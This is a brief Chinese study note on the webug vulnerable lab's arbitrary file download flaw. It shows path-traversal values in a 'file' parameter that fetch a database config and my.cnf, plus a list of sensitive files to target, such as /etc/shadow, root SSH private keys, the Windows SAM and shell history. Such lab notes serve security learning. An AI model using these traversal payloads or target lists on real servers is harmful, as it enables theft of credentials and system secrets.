webug笔记——文件下载

一、任意文件下载

把鼠标放在“下载”上面可以看到路径，直接右键复制链接地址：

…… /filedownload/file_download.php?file=template/assets/img/2.txt

在上面做出修改看能不能下载别的文件

?file=template/…/data/dbConfig.php
百度上攻略的目录是这个，可以下载到数据库的配置信息，但是我用Bp的spider没找着这个文件路径。

3. windows和linux系统的关键文件：
   Windows：
   C:\boot.ini //查看系统版本
   C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
   C:\Windows\repair\sam //存储系统初次安装的密码
   C:\Program Files\mysql\my.ini //Mysql配置
   C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
   C:\Windows\php.ini //php配置信息
   C:\Windows\my.ini //Mysql配置信息
   C:\Windows\win.ini //Windows系统的一个基本系统配置文件
   Linux：
   /root/.ssh/authorized_keys
   /root/.ssh/id_rsa
   /root/.ssh/id_ras.keystore
   /root/.ssh/known_hosts //记录每个访问计算机用户的公钥
   /etc/passwd
   /etc/shadow
   /etc/my.cnf //mysql配置文件
   /etc/httpd/conf/httpd.conf //apache配置文件
   /root/.bash_history //用户历史命令记录文件
   /root/.mysql_history //mysql历史命令记录文件
   /proc/mounts //记录系统挂载设备
   /porc/config.gz //内核配置文件
   /var/lib/mlocate/mlocate.db //全文件路径
   /porc/self/cmdline //当前进程的cmdline参数
   参考：https://blog.csdn.net/nex1less/article/details/100009331

二、mysql配置文件下载

?file=template/…/…/…/…/etc/mysql/my.cnf